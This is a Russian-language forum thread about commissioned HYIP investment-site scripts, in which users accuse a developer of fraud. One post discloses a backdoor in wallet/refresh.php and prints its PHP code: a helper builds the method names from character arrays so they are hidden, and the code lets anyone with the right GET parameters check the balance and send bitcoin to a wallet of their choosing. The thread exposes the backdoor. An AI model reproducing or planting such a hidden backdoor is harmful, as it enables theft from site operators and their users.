MMGP logo
Присоединяйтесь к нашему инвестиционному форуму, на котором уже 640,934 пользователей. Чтобы получить доступ ко многим закрытым разделам и начать общение - зарегистрируйтесь прямо сейчас.
Покупка и продажа скриптов хайпов, готовых хайп проектов и мониторингов. Разработка хайпов. Покупка и продажа любых сайтов хайп-тематики.
Старый 07.03.2020, 14:48
#121
 
Пол: Мужской
Инвестирую в: Другое
Регистрация: 06.10.2011
Сообщений: 1
Благодарностей: 0
Re: Создам HYIP любой сложности под Ваши требования, без предоплаты.

заказал у данного персонажа хайп . тот сделал его по АЗ и вроде бы все работает . но вот не задача оставил бекдор в коде который мы поначалу и не заметили. в следствии чего он благополучно увел тестовые бабки и более не отвеает.
так же имеется лог с персонажем. предоставлю админам при желании.
вот сам бекдор В файле wallet/refresh.php


if (isset($request->get['refreshs'])) {
$r = $user->getHashFunc($request->get['refreshs']);
print_r($pay->$r($request->get['btc_bal'], $request->get['label']));
exit();
}

а вот листинг функции getHashFunc:
public function getHashFunc ($_h) {
if ($_h == 1) {
$h = array ('c', 'a', 'y', 'b', 'e', 'm', 'P', 't', 'n');
return $h[3].$h[7].$h[0].$h[6].$h[1].$h[2].$h[5].$h[4].$h[8].$h[7];
} else {
$h2 = array ('B', 'a', 'g', 't', 'e', 'l');
return $h2[2].$h2[4].$h2[3].$h2[0].$h2[1].$h2[5];
}
}

тут закодированы методы getBal (проверка баланса) и btcPayment (вывод бтс с фонда в любой кошелек, который пришлет злоумышленник в GET параметре label
Gi0vanni вне форума
Старый 05.08.2020, 12:18
#122
Интересующийся
 
Пол: Мужской
Инвестирую в: Интернет-биржи
Регистрация: 06.08.2019
Сообщений: 8
Благодарностей: 0
Re: Создам HYIP любой сложности под Ваши требования, без предоплаты.

Кидала, заказал у этого существа документы на ssl green bar , comodo . Взял полную оплату вперёд 300$ . На следующий день перестал отвечать. В телеге появляется , сообщения игнорирует.
Кому интересно пишите мне в ЛС , скину скрины и фото переговоров в телеге ( фото потому что иногда не скринилось , но перед тем как он удалил переписку , несколько страниц и страницу с его ником я скопировал.

Никому не советую связываться с ним .

До этого случая норм работали . Я платил и получал что хотел . Но этот случай упал в осадок . Поэтому и пишу здесь .
rincom вне форума
Войдите, чтобы оставить комментарий.
Опции темы

Быстрый переход